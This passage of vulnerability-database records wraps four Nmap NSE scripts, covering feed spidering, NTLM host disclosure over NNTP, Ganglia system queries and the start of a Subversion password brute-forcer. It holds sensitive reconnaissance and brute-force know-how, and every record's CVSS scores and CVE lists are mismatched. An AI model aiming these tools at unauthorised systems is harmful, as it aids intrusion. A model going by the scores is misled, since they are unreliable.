"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:53", "description": "This script crawls through the website to find any rss or atom feeds. \n\nThe script, by default, spiders and searches within forty pages. For large web applications make sure to increase httpspider's `maxpagecount` value. Please, note that the script will become more intrusive though.\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost \n\nSee the documentation for the [httpspider](<../lib/httpspider.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p80 --script http-feed.nse <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-feed:\n | Spidering limited to: maxpagecount=40; withinhost=some-random-page.com\n | Found the following feeds:\n | RSS (version 2.0): http://www.some-random-page.com/2011/11/20/feed/\n | RSS (version 2.0): http://www.some-random-page.com/2011/12/04/feed/\n | RSS (version 2.0): http://www.some-random-page.com/category/animalsfeed/\n | RSS (version 2.0): http://www.some-random-page.com/comments/feed/\n |_ RSS (version 2.0): http://www.some-random-page.com/feed/\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [string](<>)\n * [httpspider](<../lib/httpspider.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2013-08-23T01:53:34", "type": "nmap", "title": "http-feed NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-25T03:01:29", "id": "NMAP:HTTP-FEED.NSE", "href": "https://nmap.org/nsedoc/scripts/http-feed.html", "sourceData": "description = [[\nThis script crawls through the website to find any rss or atom feeds.\n\nThe script, by default, spiders and searches within forty pages. For large web\napplications make sure to increase httpspider's <code>maxpagecount</code> value.\nPlease, note that the script will become more intrusive though.\n]]\n\n---\n-- @usage nmap -p80 --script http-feed.nse <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-feed:\n-- | Spidering limited to: maxpagecount=40; withinhost=some-random-page.com\n-- | Found the following feeds:\n-- | RSS (version 2.0): http://www.some-random-page.com/2011/11/20/feed/\n-- | RSS (version 2.0): http://www.some-random-page.com/2011/12/04/feed/\n-- | RSS (version 2.0): http://www.some-random-page.com/category/animalsfeed/\n-- | RSS (version 2.0): http://www.some-random-page.com/comments/feed/\n-- |_ RSS (version 2.0): http://www.some-random-page.com/feed/\n---\n\ncategories = {\"discovery\", \"intrusive\"}\nauthor = \"George Chatzisofroniou\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nlocal http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal string = require \"string\"\nlocal httpspider = require \"httpspider\"\n\nportrule = shortport.port_or_service( {80, 443}, {\"http\", \"https\"}, \"tcp\", \"open\")\n\nFEEDS = { RSS = { search = { '<rss(.*)>' }, version = 'version=[\"\\'](.-)[\"\\']' },\n Atom = { search = { '<feed(.*)>' }, version = 'version=[\"\\'](.-)[\"\\']' },\n }\n\nFEEDS_REFS = { \"type=[\\\"']application/rss%+xml[\\\"']%s*href=[\\\"'](.-)[\\\"']\",\n \"type=[\\\"']application/rss%+xml[\\\"']%s*title=[\\\"'].-[\\\"']%s*href=[\\\"'](.-)[\\\"']\",\n \"type=[\\\"']application/atom%+xml[\\\"']%s*href=[\\\"'](.-)[\\\"']\",\n \"type=[\\\"']application/atom%+xml[\\\"']%s*title=[\\\"'].-[\\\"']%s*href=[\\\"'](.-)[\\\"']\",\n }\n\nfeedsfound = {}\n\nchecked = {}\n\n-- Searches the resource for feeds.\nlocal findFeeds = function(body, path)\n\n if body then\n for _, f in pairs(FEEDS) do\n for __, pf in pairs(f[\"search\"]) do\n\n local c = string.match(body, pf)\n\n if c then\n local v = \"\"\n -- Try to find feed's version.\n if string.match(c, f[\"version\"]) then\n v = \" (version \" .. string.match(c, f[\"version\"]) .. \")\"\n end\n feedsfound[path] = _ .. v .. \": \"\n end\n\n end\n end\n end\n checked[path] = true\nend\n\n\naction = function(host, port)\n\n --TODO: prefix this with SCRIPT_NAME and document it.\n local maxpagecount = stdnse.get_script_args(\"maxpagecount\") or 40\n\n local crawler = httpspider.Crawler:new(host, port, '/', { scriptname = SCRIPT_NAME,\n maxpagecount = maxpagecount,\n maxdepth = -1,\n withinhost = 1\n })\n\n crawler.options.doscraping = function(url)\n if crawler:iswithinhost(url)\n and not crawler:isresource(url, \"js\")\n and not crawler:isresource(url, \"css\") then\n return true\n end\n end\n\n if (not(crawler)) then\n return\n end\n\n crawler:set_timeout(10000)\n\n local index, k, target, response, path\n while (true) do\n\n local status, r = crawler:crawl()\n -- if the crawler fails it can be due to a number of different reasons\n -- most of them are \"legitimate\" and should not be reason to abort\n if (not(status)) then\n if (r.err) then\n return stdnse.format_output(false, r.reason)\n else\n break\n end\n end\n\n response = r.response\n path = tostring(r.url)\n\n if response.body then\n findFeeds(response.body, path)\n\n for _, p in ipairs(FEEDS_REFS) do\n for l in string.gmatch(response.body, p) do\n if not checked[l] then\n local resp\n -- If this is an absolute URL, use get_url.\n if string.match(l, \"^http\") then\n resp = http.get_url(l)\n else\n resp = http.get(host, port, l)\n end\n if resp.body then\n findFeeds(resp.body, l)\n end\n end\n end\n end\n end\n\n end\n\n -- If the table is empty.\n if next(feedsfound) == nil then\n return \"Couldn't find any feeds.\"\n end\n\n -- Create a nice output.\n local results = {}\n for c, _ in pairs(feedsfound) do\n table.insert(results, {_ .. c } )\n end\n\n table.insert(results, 1, \"Found the following feeds: \")\n\n results.name = crawler:getLimitations()\n\n return stdnse.format_output(true, results)\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:54", "description": "This script enumerates information from remote NNTP services with NTLM authentication enabled. \n\nSending an MS-NNTP NTLM authentication request with null credentials will cause the remote service to respond with a NTLMSSP message disclosing information to include NetBIOS, DNS, and OS build version.\n\n## Script Arguments \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 119,433,563 --script nntp-ntlm-info <target>\n \n\n## Script Output \n \n \n 119/tcp open nntp\n | nntp-ntlm-info:\n | Target_Name: ACTIVENNTP\n | NetBIOS_Domain_Name: ACTIVENNTP\n | NetBIOS_Computer_Name: NNTP-TEST2\n | DNS_Domain_Name: somedomain.com\n | DNS_Computer_Name: nntp-test2.somedomain.com\n | DNS_Tree_Name: somedomain.com\n |_ Product_Version: 6.1.7601\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [os](<>)\n * [datetime](<../lib/datetime.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [base64](<../lib/base64.html>)\n * [smbauth](<../lib/smbauth.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-01-08T16:17:12", "type": "nmap", "title": "nntp-ntlm-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2016-07-21T17:05:25", "id": "NMAP:NNTP-NTLM-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/nntp-ntlm-info.html", "sourceData": "local comm = require \"comm\"\nlocal os = require \"os\"\nlocal datetime = require \"datetime\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal base64 = require \"base64\"\nlocal smbauth = require \"smbauth\"\nlocal string = require \"string\"\n\n\ndescription = [[\nThis script enumerates information from remote NNTP services with NTLM\nauthentication enabled.\n\nSending an MS-NNTP NTLM authentication request with null credentials will\ncause the remote service to respond with a NTLMSSP message disclosing\ninformation to include NetBIOS, DNS, and OS build version.\n]]\n\n\n---\n-- @usage\n-- nmap -p 119,433,563 --script nntp-ntlm-info <target>\n--\n-- @output\n-- 119/tcp open nntp\n-- | nntp-ntlm-info:\n-- | Target_Name: ACTIVENNTP\n-- | NetBIOS_Domain_Name: ACTIVENNTP\n-- | NetBIOS_Computer_Name: NNTP-TEST2\n-- | DNS_Domain_Name: somedomain.com\n-- | DNS_Computer_Name: nntp-test2.somedomain.com\n-- | DNS_Tree_Name: somedomain.com\n-- |_ Product_Version: 6.1.7601\n--\n--@xmloutput\n-- <elem key=\"Target_Name\">ACTIVENNTP</elem>\n-- <elem key=\"NetBIOS_Domain_Name\">ACTIVENNTP</elem>\n-- <elem key=\"NetBIOS_Computer_Name\">NNTP-TEST2</elem>\n-- <elem key=\"DNS_Domain_Name\">somedomain.com</elem>\n-- <elem key=\"DNS_Computer_Name\">nntp-test2.somedomain.com</elem>\n-- <elem key=\"DNS_Tree_Name\">somedomain.com</elem>\n-- <elem key=\"Product_Version\">6.1.7601</elem>\n\n\nauthor = \"Justin Cacak\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\n\nlocal ntlm_auth_blob = base64.enc( select(2,\n smbauth.get_security_blob(nil, nil, nil, nil, nil, nil, nil,\n 0x00000001 + -- Negotiate Unicode\n 0x00000002 + -- Negotiate OEM strings\n 0x00000004 + -- Request Target\n 0x00000200 + -- Negotiate NTLM\n 0x00008000 + -- Negotiate Always Sign\n 0x00080000 + -- Negotiate NTLM2 Key\n 0x20000000 + -- Negotiate 128\n 0x80000000 -- Negotiate 56\n ))\n )\n\n\nportrule = shortport.port_or_service({ 119, 433, 563 }, { \"nntp\", \"snews\" })\n\naction = function(host, port)\n\n local output = stdnse.output_table()\n\n -- Negotiate connection protocol\n local socket, line, bopt, first_line = comm.tryssl(host, port, \"\" , {timeout=10000, recv_before=true})\n if not socket then\n return\n end\n\n -- Do not attempt to upgrade to a TLS connection if already over TLS\n if not shortport.ssl(host,port) then\n -- Attempt to upgrade to a TLS connection if supported (may not be advertised)\n -- Various implementations *require* this before accepting authentication requests\n socket:send(\"STARTTLS\\r\\n\")\n local status, response = socket:receive()\n if not status then\n return\n end\n -- Upgrade the connection if STARTTLS permitted, else continue without\n if string.match(response, \"382 .*\") then\n status, response = socket:reconnect_ssl()\n if not status then\n return\n end\n end\n end\n\n socket:send(\"AUTHINFO GENERIC NTLM\\r\\n\")\n local status, response = socket:receive()\n -- If server supports NTLM authentication then continue\n if string.match(response, \"381 .*\") then\n socket:send(\"AUTHINFO GENERIC \" .. ntlm_auth_blob ..\"\\r\\n\")\n status, response = socket:receive()\n if not response then\n return\n end\n end\n\n local recvtime = os.time()\n socket:close()\n\n -- Continue only if a 381 response is returned\n local response_decoded = string.match(response, \"381 (.*)\")\n if not response_decoded then\n return nil\n end\n\n local response_decoded = base64.dec(response_decoded)\n\n -- Continue only if NTLMSSP response is returned\n if not string.match(response_decoded, \"^NTLMSSP\") then\n return nil\n end\n\n -- Leverage smbauth.get_host_info_from_security_blob() for decoding\n local ntlm_decoded = smbauth.get_host_info_from_security_blob(response_decoded)\n\n if ntlm_decoded.timestamp then\n -- 64-bit number of 100ns clicks since 1/1/1601\n local unixstamp = ntlm_decoded.timestamp // 10000000 - 11644473600\n datetime.record_skew(host, unixstamp, recvtime)\n end\n\n -- Target Name will always be returned under any implementation\n output.Target_Name = ntlm_decoded.target_realm\n\n -- Display information returned & ignore responses with null values\n if ntlm_decoded.netbios_domain_name and #ntlm_decoded.netbios_domain_name > 0 then\n output.NetBIOS_Domain_Name = ntlm_decoded.netbios_domain_name\n end\n\n if ntlm_decoded.netbios_computer_name and #ntlm_decoded.netbios_computer_name > 0 then\n output.NetBIOS_Computer_Name = ntlm_decoded.netbios_computer_name\n end\n\n if ntlm_decoded.dns_domain_name and #ntlm_decoded.dns_domain_name > 0 then\n output.DNS_Domain_Name = ntlm_decoded.dns_domain_name\n end\n\n if ntlm_decoded.fqdn and #ntlm_decoded.fqdn > 0 then\n output.DNS_Computer_Name = ntlm_decoded.fqdn\n end\n\n if ntlm_decoded.dns_forest_name and #ntlm_decoded.dns_forest_name > 0 then\n output.DNS_Tree_Name = ntlm_decoded.dns_forest_name\n end\n\n if ntlm_decoded.os_major_version then\n output.Product_Version = string.format(\"%d.%d.%d\",\n ntlm_decoded.os_major_version, ntlm_decoded.os_minor_version, ntlm_decoded.os_build)\n end\n\n return output\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:08", "description": "Retrieves system information (OS version, available memory, etc.) from a listening Ganglia Monitoring Daemon or Ganglia Meta Daemon. \n\nGanglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids. The information retrieved includes HDD size, available memory, OS version, architecture (and more) from each of the systems in each of the clusters in the grid. \n\nFor more information about Ganglia, see: \n\n * <http://ganglia.sourceforge.net/>\n * <http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Monitoring_Daemon_.28gmond.29>\n * <http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Meta_Daemon_.28gmetad.29>\n\n## Script Arguments \n\n#### ganglia-info.bytes \n\nSet the number of bytes to retrieve. The default value is 1000000. This should be enough for a grid of more than 100 hosts. About 5KB-10KB of data is returned for each host in the cluster.\n\n#### ganglia-info.timeout \n\nSet the timeout in seconds. The default value is 30.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script ganglia-info --script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p <port> <target>\n \n\n## Script Output \n \n \n 8649/tcp open unknown syn-ack\n | ganglia-info:\n | Ganglia Version: 3.1.7\n | Cluster 1:\n | Name: unspecified\n | Owner: unspecified\n | Host 1:\n | Name: sled9735.sd.dreamhost.com\n | IP: 10.208.42.221\n | load_one: 0.53\n | mem_total: 24685564KB\n | os_release: 3.1.9-vs2.3.2.5\n | proc_run: 0\n | load_five: 0.52\n | gexec: OFF\n | disk_free: 305.765GB\n | mem_cached: 18857264KB\n | pkts_in: 821.73packets/sec\n | bytes_in: 72686.10bytes/sec\n | bytes_out: 5612221.50bytes/sec\n | swap_total: 1998844KB\n | mem_free: 187964KB\n | load_fifteen: 0.57\n | os_name: Linux\n | boottime: 1429708366s\n | cpu_idle: 96.3%\n | cpu_user: 2.7%\n | cpu_nice: 0.0%\n | cpu_aidle: 94.7%\n | mem_buffers: 169588KB\n | cpu_system: 0.8%\n | part_max_used: 31.5%\n | disk_total: 435.962GB\n | mem_shared: 0KB\n | cpu_wio: 0.2%\n | machine_type: x86_64\n | proc_total: 1027\n | cpu_num: 8CPUs\n | cpu_speed: 2400MHz\n | pkts_out: 3977.13packets/sec\n | swap_free: 1393392KB\n \n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [shortport](<../lib/shortport.html>)\n * [slaxml](<../lib/slaxml.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-10-04T05:45:54", "type": "nmap", "title": "ganglia-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-06-27T19:13:41", "id": "NMAP:GANGLIA-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/ganglia-info.html", "sourceData": "local comm = require \"comm\"\nlocal shortport = require \"shortport\"\nlocal slaxml = require \"slaxml\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves system information (OS version, available memory, etc.) from\na listening Ganglia Monitoring Daemon or Ganglia Meta Daemon.\n\nGanglia is a scalable distributed monitoring system for high-performance\ncomputing systems such as clusters and Grids. The information retrieved\nincludes HDD size, available memory, OS version, architecture (and more) from\neach of the systems in each of the clusters in the grid.\n\nFor more information about Ganglia, see:\n* http://ganglia.sourceforge.net/\n* http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Monitoring_Daemon_.28gmond.29\n* http://en.wikipedia.org/wiki/Ganglia_(software)#Ganglia_Meta_Daemon_.28gmetad.29\n]]\n\n---\n-- @usage\n-- nmap --script ganglia-info --script-args ganglia-info.timeout=60,ganglia-info.bytes=1000000 -p <port> <target>\n--\n-- @args ganglia-info.timeout\n-- Set the timeout in seconds. The default value is 30.\n-- @args ganglia-info.bytes\n-- Set the number of bytes to retrieve. The default value is 1000000.\n-- This should be enough for a grid of more than 100 hosts.\n-- About 5KB-10KB of data is returned for each host in the cluster.\n--\n-- @output\n-- 8649/tcp open unknown syn-ack\n-- | ganglia-info:\n-- | Ganglia Version: 3.1.7\n-- | Cluster 1:\n-- | Name: unspecified\n-- | Owner: unspecified\n-- | Host 1:\n-- | Name: sled9735.sd.dreamhost.com\n-- | IP: 10.208.42.221\n-- | load_one: 0.53\n-- | mem_total: 24685564KB\n-- | os_release: 3.1.9-vs2.3.2.5\n-- | proc_run: 0\n-- | load_five: 0.52\n-- | gexec: OFF\n-- | disk_free: 305.765GB\n-- | mem_cached: 18857264KB\n-- | pkts_in: 821.73packets/sec\n-- | bytes_in: 72686.10bytes/sec\n-- | bytes_out: 5612221.50bytes/sec\n-- | swap_total: 1998844KB\n-- | mem_free: 187964KB\n-- | load_fifteen: 0.57\n-- | os_name: Linux\n-- | boottime: 1429708366s\n-- | cpu_idle: 96.3%\n-- | cpu_user: 2.7%\n-- | cpu_nice: 0.0%\n-- | cpu_aidle: 94.7%\n-- | mem_buffers: 169588KB\n-- | cpu_system: 0.8%\n-- | part_max_used: 31.5%\n-- | disk_total: 435.962GB\n-- | mem_shared: 0KB\n-- | cpu_wio: 0.2%\n-- | machine_type: x86_64\n-- | proc_total: 1027\n-- | cpu_num: 8CPUs\n-- | cpu_speed: 2400MHz\n-- | pkts_out: 3977.13packets/sec\n-- | swap_free: 1393392KB\n--\n-- @xmloutput\n-- <elem key=\"Ganglia Version\">3.1.7</elem>\n-- <table key=\"Cluster 1\">\n-- <elem key=\"Name\">unspecified</elem>\n-- <elem key=\"Owner\">unspecified</elem>\n-- <table key=\"Host 1\">\n-- <elem key=\"Name\">sled9735.sd.dreamhost.com</elem>\n-- <elem key=\"IP\">10.208.42.221</elem>\n-- <elem key=\"load_one\">0.53</elem>\n-- <elem key=\"mem_total\">24685564KB</elem>\n-- <elem key=\"os_release\">3.1.9-vs2.3.2.5</elem>\n-- <elem key=\"proc_run\">0</elem>\n-- <elem key=\"load_five\">0.52</elem>\n-- <elem key=\"gexec\">OFF</elem>\n-- <elem key=\"disk_free\">305.765GB</elem>\n-- <elem key=\"mem_cached\">18857264KB</elem>\n-- <elem key=\"pkts_in\">821.73packets/sec</elem>\n-- <elem key=\"bytes_in\">72686.10bytes/sec</elem>\n-- <elem key=\"bytes_out\">5612221.50bytes/sec</elem>\n-- <elem key=\"swap_total\">1998844KB</elem>\n-- <elem key=\"mem_free\">187964KB</elem>\n-- <elem key=\"load_fifteen\">0.57</elem>\n-- <elem key=\"os_name\">Linux</elem>\n-- <elem key=\"boottime\">1429708366s</elem>\n-- <elem key=\"cpu_idle\">96.3%</elem>\n-- <elem key=\"cpu_user\">2.7%</elem>\n-- <elem key=\"cpu_nice\">0.0%</elem>\n-- <elem key=\"cpu_aidle\">94.7%</elem>\n-- <elem key=\"mem_buffers\">169588KB</elem>\n-- <elem key=\"cpu_system\">0.8%</elem>\n-- <elem key=\"part_max_used\">31.5%</elem>\n-- <elem key=\"disk_total\">435.962GB</elem>\n-- <elem key=\"mem_shared\">0KB</elem>\n-- <elem key=\"cpu_wio\">0.2%</elem>\n-- <elem key=\"machine_type\">x86_64</elem>\n-- <elem key=\"proc_total\">1027</elem>\n-- <elem key=\"cpu_num\">8CPUs</elem>\n-- <elem key=\"cpu_speed\">2400MHz</elem>\n-- <elem key=\"pkts_out\">3977.13packets/sec</elem>\n-- <elem key=\"swap_free\">1393392KB</elem>\n-- </table>\n-- </table>\n--\n-- Version 0.2\n-- Created 2011-06-28 - v0.1 - created by Brendan Coles - itsecuritysolutions.org\n-- Created 2015-07-30 - v0.2 - Added Support for SLAXML by Gyanendra Mishra\n\nauthor = {\"Brendan Coles\", \"Gyanendra Mishra\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nportrule = shortport.port_or_service ({8649,8651}, \"ganglia\", {\"tcp\"})\n\nlocal function set_name_value(name)\n return function(value, state)\n state.result[name] = value\n end\nend\n\nlocal function set_cluster(name)\n return function(value, state)\n local current = state[#state]\n if not current.out then\n state.cc = state.cc + 1\n current.out = stdnse.output_table()\n current.hc = 0\n state.result[\"Cluster \" .. state.cc] = current.out\n end\n state.result[\"Cluster \" .. state.cc][name] = value\n end\nend\n\nlocal function get_current_cluster(state)\n for i=#state, 1, -1 do\n if state[i][1] == \"CLUSTER\" then\n return state[i]\n end\n end\nend\n\nlocal function set_host(name)\n return function(value, state)\n local current = state[#state]\n local current_cluster = get_current_cluster(state)\n if not current.out then\n current_cluster.hc = current_cluster.hc + 1\n current.out = stdnse.output_table()\n state.result[\"Cluster \" .. state.cc][\"Host \" .. current_cluster.hc] = current.out\n end\n state.result[\"Cluster \" .. state.cc][\"Host \" .. current_cluster.hc][name] = value\n end\nend\n\nlocal function set_metric(name)\n return function(value, state)\n local current = state[#state]\n local current_cluster = get_current_cluster(state)\n current[name] = value\n if current[\"name\"] and current[\"value\"] and current[\"unit\"] then\n state.result[\"Cluster \" .. state.cc][\"Host \" .. current_cluster.hc][current[\"name\"]] = current[\"value\"] .. current[\"unit\"]\n end\n end\nend\n\nlocal P = {\n GANGLIA_XML = {\n VERSION = set_name_value(\"Ganglia Version\"),\n },\n GRID = {\n NAME = set_name_value(\"Grid Name\"),\n },\n CLUSTER = {\n NAME = set_cluster(\"Name\"),\n OWNER = set_cluster(\"Owner\"),\n },\n HOST = {\n NAME = set_host(\"Name\"),\n IP = set_host(\"IP\"),\n },\n METRIC = {\n NAME = set_metric(\"name\"),\n UNITS = set_metric(\"unit\"),\n VAL = set_metric(\"value\"),\n }\n}\n\naction = function( host, port )\n\n local result = stdnse.output_table()\n\n -- Set timeout\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. '.timeout'))\n timeout = timeout or 30\n\n -- Set bytes\n local bytes = stdnse.get_script_args(SCRIPT_NAME .. '.bytes')\n bytes = tonumber(bytes) or 1000000\n\n -- Retrieve grid data in XML format over TCP\n stdnse.debug1(\"Connecting to %s:%s\", host.targetname or host.ip, port.number)\n local status, data = comm.get_banner(host, port, {request_timeout=timeout*1000,bytes=bytes})\n if not status then\n stdnse.debug1(\"Timeout exceeded for %s:%s (Timeout: %ss).\", host.targetname or host.ip, port.number, timeout)\n return\n end\n\n local state = {\n cc = 0,\n result=stdnse.output_table()\n }\n\n local parser = slaxml.parser:new()\n parser._call = {\n startElement = function(name) table.insert(state, {name}) end,\n closeElement = function(name) assert(state[#state][1] == name) state[#state] = nil end,\n attribute = function(name, value)\n local p_elem = P[state[#state][1]]\n if not (p_elem and p_elem[name]) then return end\n local p_attr = p_elem[name]\n if not p_attr then return end\n p_attr(value, state)\n end,\n }\n\n parser:parseSAX(data, {stripWhitespace=true})\n\n if #state.result then return state.result end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:33:58", "description": "Performs brute force password auditing against Subversion source code control servers.\n\n## Script Arguments \n\n#### svn-brute.repo \n\nthe Subversion repository against which to perform password guessing\n\n#### svn-brute.force \n\nforce password guessing when service is accessible both anonymously and through authentication\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 3690/tcp open svn syn-ack\n | svn-brute:\n | Accounts\n |_ patrik:secret => Login correct\n \n Summary\n -------\n x The svn class contains the code needed to perform CRAM-MD5\n authentication\n x The Driver class contains the driver implementation used by the brute\n library\n \n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [openssl](<../lib/openssl.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-08-18T20:50:51", "type": "nmap", "title": "svn-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SVN-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/svn-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal openssl = stdnse.silent_require 